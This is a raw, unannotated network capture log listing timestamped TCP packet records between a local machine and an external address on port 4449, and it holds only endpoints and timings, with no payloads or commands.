Dec 10, 2024 11:11:21.542104959 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.542223930 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.542264938 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.550178051 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.550210953 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.550254107 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.558202028 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.558310986 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.558374882 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.566263914 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.566363096 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.566426992 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.574434996 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.574481964 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.574557066 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.581871033 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.581990957 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.582036972 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.589638948 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.589699984 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.589772940 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.609196901 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.702137947 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.702265978 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.702333927 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.704551935 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.704602003 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.704654932 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.704699039 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.709341049 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.709464073 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.709523916 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.714210033 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.714360952 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.714407921 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.719091892 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.719165087 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.719213009 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.723649979 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.723741055 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.723781109 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.723815918 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.728252888 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.728348017 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.728395939 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.732917070 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.732973099 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.733056068 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.733103037 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.737585068 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.737703085 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.737755060 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.742307901 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.742448092 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.742511988 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.749217033 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.758357048 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.758369923 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.758414030 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.760751009 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.760808945 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.760931015 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.760982037 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.765507936 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.765652895 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.765702009 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.770003080 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.770016909 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.770054102 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.770073891 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.774540901 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.774702072 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.774749041 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.779063940 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.779097080 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.779186010 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.779218912 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.783874989 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.783890009 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.783936024 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.786957979 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.786971092 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.787035942 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.787035942 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.791281939 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.791356087 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.791405916 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.795914888 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.796099901 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.796145916 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.823223114 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.823235989 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.823292017 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.823904991 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.823985100 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.824028969 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.828587055 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.879448891 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:21.947488070 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:21.947782993 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.024027109 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.024053097 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.024116039 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.024152994 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.024188042 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.025981903 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.026027918 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.026058912 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.026102066 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.028168917 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.028278112 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.028327942 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.030023098 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.030067921 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.030100107 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.030134916 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.032061100 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.032219887 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.032255888 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.067322969 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.105684042 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.105734110 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.105791092 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.106705904 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.106949091 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.106990099 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.107074022 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.109060049 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.109249115 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.109297991 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.111085892 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.111131907 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.111157894 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.113096952 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.113126040 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.113137960 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.115091085 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.115142107 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.122939110 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.176212072 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.343174934 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.343235016 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.348331928 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.348860979 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.348905087 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.349057913 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.349093914 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.350430965 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.350470066 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.350505114 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.350544930 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.352392912 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.352448940 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.352493048 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.352531910 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.354417086 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.354470015 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.354479074 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.354511023 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.356518984 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.356578112 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.356611967 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.356647968 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.358568907 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.358618021 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.358701944 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.358741999 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.360673904 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.360709906 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.360840082 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.360874891 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.362600088 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.362636089 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.362751961 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.362786055 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.364629030 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.364676952 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.364712954 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.364754915 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.366695881 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.366733074 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.366791010 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.366832018 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.368715048 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.368765116 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.368837118 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.368876934 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.370754004 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.370811939 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.370861053 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.370897055 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.372823954 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.372859955 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.372936964 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.372978926 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.374876976 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.374913931 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.374942064 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.374974012 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.376887083 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.376933098 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.376935959 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.376975060 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.379009008 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.379054070 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.379076958 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.379112959 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.380959988 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.381016016 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.381062031 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.381095886 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.383028984 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.383071899 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.383136988 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.383171082 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.385041952 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.385087013 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.385154963 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.385195017 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.387141943 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.387181997 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.387229919 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.387267113 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.389122963 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.389163971 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.389195919 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.441894054 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.462637901 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.468267918 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.468283892 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.468336105 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.469800949 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.470293999 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.470335960 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.471755028 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.471851110 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.471890926 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.473777056 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.473869085 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.473906040 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.475871086 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.475999117 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.476038933 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.477956057 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.478054047 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.478091955 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.479999065 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.480092049 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.480134964 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.481893063 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.481942892 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.481976986 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.483927011 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.484029055 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.484069109 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.485964060 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.486005068 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.486047029 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.487999916 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.488035917 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.488079071 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.490030050 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.490056038 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.490107059 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.492248058 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.492381096 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.492418051 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.494170904 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.494309902 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.494345903 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.496640921 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.496653080 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.496702909 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.498334885 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.498549938 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.498586893 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.500231981 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.500329971 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.500366926 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.502264977 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.502301931 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.502336025 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.505181074 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.506387949 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.506421089 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.507041931 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.507054090 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.507090092 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.508596897 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.508912086 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.508951902 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.588150024 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.588213921 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.588255882 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.589984894 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.590010881 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.590045929 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.591259956 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.591290951 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.591330051 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.593240023 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.595367908 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.595415115 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.595453978 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.597383976 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.597423077 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.597533941 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.599400997 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.599440098 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.599510908 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.601320982 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.601356983 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.601363897 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.603343010 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.603385925 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.603441000 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.605288982 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.605329037 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.605398893 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.607616901 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.607649088 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.607690096 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.609453917 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.609502077 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.609544039 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.611761093 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.611803055 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.611804962 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.613629103 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.613666058 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:22.613778114 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.615964890 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:22.615998983 CET	49856	4449	192.168.2.5	205.209.109.10
